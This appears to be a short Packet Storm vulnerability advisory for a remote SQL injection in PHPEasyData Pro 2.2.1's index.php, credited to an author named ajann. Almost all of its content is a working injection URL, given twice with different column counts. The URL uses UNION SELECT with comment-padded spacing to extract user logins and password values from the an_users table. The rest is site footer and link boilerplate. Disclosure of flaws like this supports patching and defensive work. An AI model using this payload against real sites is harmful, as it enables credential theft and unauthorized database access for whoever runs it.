PHPEasyData Pro 2.2.1 suffers from a SQL injection vulnerability in index.php.
86a25a3b5aefd59ee9a0b8bc83a2ae72Vulnerability Report
*******************************************************************************
# Title : PHPEasyData Pro 2.2.1 (index.php) Remote SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
###http://[target]/[path]/index.php?cat=[ SQL ]
Example:
//index.php?cat=-1/**/union/**/select/**/0,concat(user_login,char(32),user_pass),0,0,0/**/from/**/an_users/**/where/**/user_id%20like%205/*
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
###http://[target]/[path]/index.php?cat=[ SQL ]
Example:
//index.php?cat=-1/**/union/**/select/**/0,concat(user_login,char(32),user_pass),0,0/**/from/**/an_users/**/where/**/user_id%20like%205/*
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!